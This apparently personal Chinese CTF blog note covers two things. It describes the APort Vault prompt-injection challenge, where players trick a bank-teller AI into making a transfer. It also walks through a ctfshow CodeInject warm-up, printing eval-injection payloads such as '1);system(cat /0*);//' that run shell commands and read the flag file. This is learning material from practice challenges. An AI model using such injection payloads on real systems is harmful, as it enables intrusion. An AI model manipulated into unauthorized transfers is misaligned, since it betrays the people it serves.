APort Vault CTF这个感觉很有意思ai提示词注入很新颖界面也很酷炫命令行式的界面给了银行取钱的情景目的是欺骗ai让它直接转账这个比赛还正在进行中链接如下https://vault.aport.io/难度1还是很容易突破的容易培养对这方面的兴趣但后面逐渐上难度被卡住了感觉这个方向AI安全太有意思了以后一定要搞懂它ctfshow/xgctfCodeInject 热身题学习post方法传数据数据必须放在键为1的参数里1然后闭合1);开始写自己的命令让eval函数执行system(ls);再把后面注释掉 //合起来就是11);system(ls);//不过这个出来的目录没什么信息还得再加一层11);system(ls /);// 才看到000flag.txt,所以最终payload长这样11);system(cat /0*);//cat相关读取根目录下的 flag 文件cat /flag通配符*匹配任意数量的任意字符。?匹配单个任意字符。摆烂ing